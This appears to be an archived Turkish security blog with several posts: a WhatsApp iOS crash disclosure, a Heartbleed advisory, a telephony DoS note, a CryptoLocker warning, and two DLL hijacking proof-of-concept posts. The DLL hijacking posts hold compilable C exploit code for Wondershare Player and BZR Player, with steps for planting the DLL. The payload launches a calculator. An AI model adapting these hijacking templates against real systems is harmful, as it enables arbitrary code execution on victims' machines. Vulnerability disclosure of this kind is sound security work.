2 Şubat 2015 Pazartesi

Whatsapp CrashMessage For IOS (DOS/POC - 0 day)

Whatsapp Crash Message For IOS (DOS/POC - 0 day)




Whatsapp crash message for IOS başlığı altında bugünkü yazımda uzun süreden sonra yazıyorum tekrardan bloguma kendi buldugum DOS/POC bir açığı paylaşacağım sizlerle Whatsapp uygulamasının IOS versiyonu üzerinde bulunan bu acık sayesinde whatsapp uygulaması crash olmakta ve bir süre acılmamaktadır. Bu acık tamamiyle bendeniz tarafından keşfedilmiştir. Gerekli informasyonel bilgiyi whatsapp sirketi ile email yoluyla paylaşmış bulunmaktayım.

Test ettiğim platformlar
Iphone 5, Iphone 5S, Iphone 6, Iphone 4S

Bütün IOS versiyonları güncel ve Whatsapp versiyonu son versiyon dahil etkilenmekte.

Hatayı test etmek için

http://www.crashmessage.com

sitesini kullanabilirsiniz.

---- English

I am writing my blog again after a long time and todays article for about Whatsapp Crash DOS/POC. This fully discovered by me and all informational metarial share with Whatsapp INC. This bug impact is if received malicious location message via whatsapp ios messenger. Whatsapp crash immediatelly and never open for a while.

Tested Platform:
Iphone 5, Iphone 5S, Iphone 6, Iphone 4S (All IOS version latest and whatsapp messenger version latest)

If you test this bug to your Iphone. please using

http://www.crashmessage.com

30 Aralık 2014 Salı

Bilişim Güvenliği

Bilişim güvenliği sektöründe çalışan yada bilişim güvenliği ile ilgili gelişmeleri takip etmek isteyen kullanıcılar için Türkçe içerik yayınımız aylık olarak blogumuz üzerinden devam edecektir. Bilişim güvenliği hizmetleri yazılarına blogumuzdan ulaşabilir, yorumlarınız ile katkıda bulunabilir yada yayınlanmasını istediğiniz yazı veya soruları tarafımıza gönderebilirsiniz. Bu aşamadan sonra uzmanlarımız yayınlarınızı yada sorunlarınızı inceleyecek ve sizlere bu konular hakkındaki detaylı bilgileri sağlayacaklardır.

Blogumuzda bugüne kadar genellikle en çok duyulan yazılım açıklarını yada kapatılmaması halinde risk oluşturabilecek yazılım açıklarını aktarmaya çalıştık. Okuduğunuz yayından sonra da gelecek yayınlar içerisinde ünlü bilişim güvenliği uzmanlarının dünyadaki sektör geneline bakıp yaptıkları yorumlar, gelecekle ilgili görüşleri, uzmanlarımızın fark ettikleri yazılım açıkları, gelişen dünya ve teknoloji ile değişen ve önemini arttıran siber güvenlik konuları hakkındaki uzmanlarımızın önerilerine yer vereceğiz.

Siber güvenlik hizmetleri ile ilgili genel bilgiye :

Bilişim Güvenliği linki üzerinden ulaşabilir.

Penetrasyon testleri ile ilgili genel bilgilere:

Penetrasyon Testleri linki üzerinden ulaşabilir.

Kaynak kod analizleri ile ilgili genel bilgiye:

Kaynak kod analizleri linki üzerinden ulaşabilirsiniz.

Bilişim güvenliği hizmetleri ile ilgili sektör çalışmalarına devam eden kişiler içinse bir çok topluluk ve dergide veya web sayfalarında bulunmuş içerikler taranacak ve önemli görünenler blog üzerinden paylaşılacaktır. Bu aşamadan sonra yapılacak çalışmalarda detaylar tüm ayrıntıları ile bloga aktarılacaktır.

Ayrıca özel ürün incelemeleri ve bilişim güvenliği ürünlerinin işinize sağlayacağı katkılar hakkında da detaylı araştırmalar raporları ile birlikte yayınlanacaktır.


10 Nisan 2014 Perşembe

OpenSSL Heart Bleed

Selamlar,

Uzun bir aradan sonra 2011 deki RDP açığından sonra gelen en büyük güvenlik tehlikesi 4 Nisan itibariyle dünyayı tehdit etmeye başladı. Bu yüzden bizde takipçilerimize bu yazıyı yazarak uyarıda bulunmak istedik. OpenSSL kütüphanesinde bulunan bir güvenlik zafiyeti sayesinde saldırgan sistem üzerindeki root sertifikaları çalabilir veya hafızada bulunan kullanıcı adı, şifre gibi birçok kritik dataya erişebilmektedir. Birçok büyük site yahoo, amazon , gmail v.b kullanıcılarına uyarılarda bulunarak parolalarını değiştirmesini söyleyen epostalar göndermeye başladılar.

Risk Altındaki OpenSSL versiyonları
OpenSSL 1.0.1e-fips
OpenSSL 1.0.1 1.0.1f

Risk Taşımayan Versiyonlar
OpenSSL 1.0.1g
OpenSSL 1.0.0
OpenSSL 0.9.8

Zafiyet içeren İşletim Sistemleri

Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
CentOS 6.5, OpenSSL 1.0.1e-15
Fedora 18, OpenSSL 1.0.1e-4
OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
FreeBSD 10.0 – OpenSSL 1.0.1e 11 Feb 2013
NetBSD 5.0.2 (OpenSSL 1.0.1e)
OpenSUSE 12.2 (OpenSSL 1.0.1c)

Zafiyeti Fix Etme Metodları 

CentOS tabanlı sistemler için: yum update
Debian tabanlı sistemler için: apt-get update

Eğer yayınlanmıs update paketi mevcut değil ise: OpenSSL i su flag ile tekrar derlemeniz gerekmektedir.

-DOPENSSL_NO_HEARTBEATS

Detaylı kaynaklar için Googleda Heart Bleed aramasını yapabilirsiniz. 

http://heartbleed.com/

27 Kasım 2013 Çarşamba

Phone2DOS (TDOS)

Selamlar,

Yaklasık 3 yıl once ISTSEC konferansında anlattıgımız ve 2 yıl once MI6 v.b üst düzey kurumlara baslayan bir atak cesidi TDOS tan biraz bahsetmek istiyorum. TDOS ta metod olarak DDOS a benzeyen bir saldırı türüdür. Amac saldırı yapılan santrali veya kisinin telefonunu mesgul tutmak ve ulasılmaz hale getirmektir. İlk Olarak 3 yıl once ISTSEC bilgi güvenliği konferansında bunu dile getirmis ve dünyayı bekleyen yeni tip bir saldırı olarak nitelendirerek herkesi hazırlıklı olmaya cagirmistik. yine 2012 yılında ISCTURKEY konferansında bu saldırıyı anlatarak uygulamalı demolar gosterdik bu senede ASIS (ISC2) 2013 Dünyanın en büyük ulusal güvenlik ve siber güvenlik fuarı ve konferansındada bu konusmayı gerceklestirdik. Su günlerde ise underground level forumlarda ruslar tarafından yazılmıs bir TDOS toolu satısa sunulmus durumda.

Gerekli Linkler:

http://blog.lifeoverip.net/2011/06/19/istsec-11-sunum-ve-fotograflari/

http://www.iscturkey.org/index.php?option=com_content&view=article&id=46&Itemid=63

https://asis.confex.com/asis/ansem2013/webprogram/Session27448.html

Cok Yakında burdan presantasyon dosyalarınıda paylasmıs olacagım....






Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking (0-day)

Selamlar,

Yine shellcoding ve exploiting teknikleri üzerine bir calisma yaparken meshur bir video player üzerinde BZR Player 'a benzeyen bir dll hijacking güvenlik acigi kesfettim. Cesitli security sitelerinde exploiti paylastıktan sonra burdanda paylasmanın uygun olacagını düsündüm.

Exploitin Kanıt Videosu:


Exploit Code:

/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability
// # Date: 27.11.2013
// # Exploit Author: Akin Tosunlar
// # Software Link: http://download.wondershare.com/player_full1374.exe
// # Version: 1.6.0 (Probably old version of software and the LATEST version too)
// # Vendor Homepage: http://www.wondershare.com
// # Tested on: [ Windows XP sp3]
// # Contact : info@vigasis.com
// #------------------
// # Web Page : http://www.vigasis.com
// #
// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA
// #
// #  gcc -shared -o ws_converterex.dll evil.c
// #  Compile evil.c and rar or zip avi file and ws_converterex.dll same folder. Associate Default Player as Wondershare Player or OpenWith Wondershare Player.Double-click AVI File. program start Calc.exe immediately.
// #
*/


#include <windows.h>

int evilcode()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
evilcode();
return 0;
}

Tesekkurler.

25 Kasım 2013 Pazartesi

BZR Player 0.97 (codec_mpeg.dll) Dll Hijack Güvenlik Açığı (0-day)

Selamlar,

Son günlerde yaptıgım birkac exploiting ar-ge calismasi sirasinda kesfettiğim BZR Player 0.97 sürümünde olan ki bu aplikasyonun son sürümü dll hijacking güvenlik acigiyla ilgili bir yazi yazacagim.

Oncelikle nedir bu DLL Hijacking?

DLL hijacking windows sistemlerde calisan exe dosyalarin kullandigi yani calisirken yüklediği DLL leri oncelikle calistirdiği dosyanın dosya path inde aramasından ileri gelen güvenlik acıklarıdır. Daha acık anlatırsak. BZR Player dan ornek vereceğim bir media player oldugu icin .m3u , .wav , .mp3 v.b desteklediği mevcuttur ve biz BZR Player i varsayılan media playerimiz olarak isaretlemissek. BZR player mp3 dosyalarını calabilmesi gerekli olan codec_mpeg.dll i mp3 dosyasına tıkladıgımızda yükleyecek ve calmaya baslayacaktır fakat dll dosyasını ilk once .mp3 dosyasının path inde arayacak eger orda bulamazsa kendi kurulum dosyalarının bulundugu dizinde arayacaktır. DLL hijack güvenlik zafiyetleride tam bu noktada devreye girmektedir. Bunu sömürmenin birkac farklı yolu olmakla ben en sık kullanılan 2 metodu anlatacagım.

1. Metod

DLLMain fonksiyonu ile istediğimiz islemi calistirmaktır. En sık kullanılan ve en kolay metodtur.

Asagidaki kodu codec_mpeg.dll olarak derleyip. herhangi bir mp3 dosyasıyla aynı klasore koyarak mp3 dosyasına cift tıkladıgımızda yada Birikte AC > BZR Player sectigimizde kendi path indeki evil dll imizi load edecek ve calc.exe yi calistiracaktir. Ornek kod asagidadir.

***************************
#include <windows.h>

int evilcode()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
evilcode();
return 0;
}
****************************

Derleme ile ugrasmak istemeyenler icin derlenmis dosya linkini veriyorum.
http://www.filedropper.com/codecmpeg


Indirginiz dll dosyası ve mp3 dosyasını aynı klasore koyarak BZR player ile actiginizda sisteminizde calculator.exe calisacaktır.


2. Metod

Bu biraz daha mesakatli bir methodtur. Bunda exploit edecegimiz dll dosyasının gerceginin icindeki EXPORTED fonksiyonları bularak o fonksiyonları kendi DLL dosyamızda tanımlayarak sistemi exploit etmeye calisacagiz.Bunun icin ben Visual C++ 6.0 ile beraber gelen dumpbin.exe dosyasını kullanacagim ama siz isterseniz 3rd party Deprencys Walker ida kullanabilirsiniz.

dumpbin.exe dosyası bizim belirttiğimiz dll icerigindeki export edilmis yani disaridan cagrilabilir fonksiyonların isimlerini belirlememizi saglayacak.


 Resimdede görüldüğü gibi codec_mpeg.dll dosyamız dısarıya acık 2 adet fonksiyon bulundurmakta onlarda
_FMODGetCodecDescriptionEx ve _FMODGetDSPDescriptionEx fonksiyonlarıda simdi bu fonksiyonlara uygun C dosyamızı yazarak derledigimizde ve yine mp3 dosyamız ile aynı klasore koydugumuzda calculator.exe nin calistigini gorecegiz. Gerekli C kodu asagidaki gibi olmalıdır.

**************** CODE ***************

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void _FMODGetCodecDescriptionEx() { evil(); }
DLLIMPORT void _FMODGetDSPDescriptionEx() { evil(); }
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
*****************************************
 Exploitle ilgili bir kısa video cekerek olayı daha iyi anlamanız icin ekliyorum..



 


Tesekkurler!!!!







23 Kasım 2013 Cumartesi

CryptoLocker Virüsüne Dikkat!!

Selamlar,

Bu yazımda bahsedeceğim bir malware fakat diğer alışılagelmiş virüslere göre değişik bir iş yapan bir virüs gectiğimiz yıllarda ülkemizdede boy gösteren bilgisayarınız bir bilişim sucuna karıştı ve kilitlendi acmak icin suraya para yatırın gibisinden mesaj cıkaran virüslerin bir benzerinden. Bu malware bulasmıs oldugu bilgisayardaki verileri çözülemeyecek sekilde kriptolayarak sizden verilerinizi geri kurtarmak icin para istemekte.

CryptoLocker virüsünün 1 haftadan kısa bir sürede 12000 den fazla ABD bilgisayarına yayıldıgı düsünülürse bu virüsün etkilerinin sadece ABD ile sınırlı kalmayacağı yakında ülkemizdede boy göstereceği birçok kişinin ve kurumun canını yakacagı kesin.

Virüs bulastıgı bilgisayarda acılısından büyük kırmızı bir ekran üzerinden verilerinizi kaybetmeden önce 100 saatiniz var gibi bir uyarı cıkararak ödemenin yapılacagı adresleri vermekte. 750 $ veya 2 Bitcoin ödeme isteyen malware sahibi hemen sonrasında size decryption keyi göndermekte ve bu virüsün gecen hafta ABD PC lerine sızmasıyla birlikte ABD polis teskilatınında bundan etkilendiği ve virüsün yazarına verilerini kurtarmak icin 750 $ gönderdiği dedikoduları yayılmaktadır. Virüsün bulasmasını engellemek icin yapılması gerekenlerden birkacını yazmakta fayda görüyorum.

  1. Birçok virüsün eposta eklentileri icerisindeki rar,zip v.b gibi dosyalar üzerinden yayıldığını düsünürsek güvenilmeyen göndericilerden gelen dosyaları acmamak , güvendiğiniz bir kisiden gelen gönderileride virüs taramasından gecirmeden acmamak , eğer mümkünse bu mail iceriklerine kendi PC'niz altında kurdugunuz sanal makina üzerinden bakmak
  2. Virüs programınızın lisanslı ve son sürümde oldugundan emin olmak. (Bazı insanların ne düsündügünü tahmin edebiliyorum virüs yeni bir virüs PE Header ları değiştirilmisse ne ise yarayacakki fakat unutulmaması gereken konu %50 ye göre %55 daha iyidir siz güvenliğinizi ne kadar arttırırsanız saldırganın isini okadar zorlastırmıs olursunuz)
  3. Düzenli yedek almak. Böylelikle kaybedeceğiniz datalarınızı minimum'a indirmis olursunuz.
  4. Cloud üzerinde yedek almak
  5. Sistem geri donus noktaları yaratarak sistemi virüs bulasmadan onceye döndürebilirsiniz.
CryptoLocker virüsünü tanıyan ve en iyi korumayı sağlayan birkac virüs programı ve antimalware şunlardır.

A) CryptoPrevent Tool: Bu arac diskinizi kriptolamaya calısan yazılımlara karsı güclü bir önleme sunmaktadır.
B) Hitman Pro AntiMalware: Yine bu program ilede kripto virüslerine karsı koruma saglayabilirsiniz
C) BitDefender Anti-CryptoBlocker: Yine BitDefender'in bu aracı sayesinde bu tip virüslerden korunmanız mümkün.